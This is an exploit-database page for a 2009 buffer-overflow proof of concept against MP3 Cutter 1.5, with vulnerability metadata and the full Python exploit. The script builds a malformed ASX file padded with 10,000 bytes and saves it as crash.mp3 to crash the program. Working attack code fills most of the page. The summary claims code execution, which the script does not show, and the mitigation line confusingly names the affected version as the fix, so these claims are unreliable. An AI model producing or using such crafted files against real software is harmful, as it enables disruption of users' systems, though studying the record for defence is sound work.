header-logo
Suggest Exploit
vendor:
MP3 Cutter 1.5
by:
Prashant a.k.a t3rm!n4t0r
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: MP3 Cutter 1.5
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:mp3_cutter:mp3_cutter_1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MP3 Cutter 1.5 Crash Exploit

This exploit is a buffer overflow vulnerability in MP3 Cutter 1.5. The vulnerability is caused due to a boundary error when handling ASX files. By creating a specially crafted ASX file, an attacker can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code.

Mitigation:

Upgrade to the latest version of MP3 Cutter 1.5
Source

Exploit-DB raw data:

##########################################################
##       Legion of Xtremers & Hackers Garage 
##       (www.loxian.co.cc)   (www.garage4hackers.com)                                                  
##                     MP3 Cutter 1.5 Crash Exploit 
##
##               Author: Prashant a.k.a t3rm!n4t0r						    
##           	c0ntact: happyterminator@gmail.com					   
##                                   				  
##  Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
###########################################################






#exploit.py
#MP3 cutter Crash Exploit

print " MP3 Cutter Crash Exploit ( mp3 file ) \n"

         	
header1 = (
			"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
		        "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
			"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
			"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
			"\x3D\x22"
			)

header2 = (
			"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
			"\x3E\x3C\x2F\x41\x53\x58\x3E"
		   )
			
crash = "\x41" * 10000

exploit = header1 + crash  + header2

try:
    out_file = open("crash.mp3",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"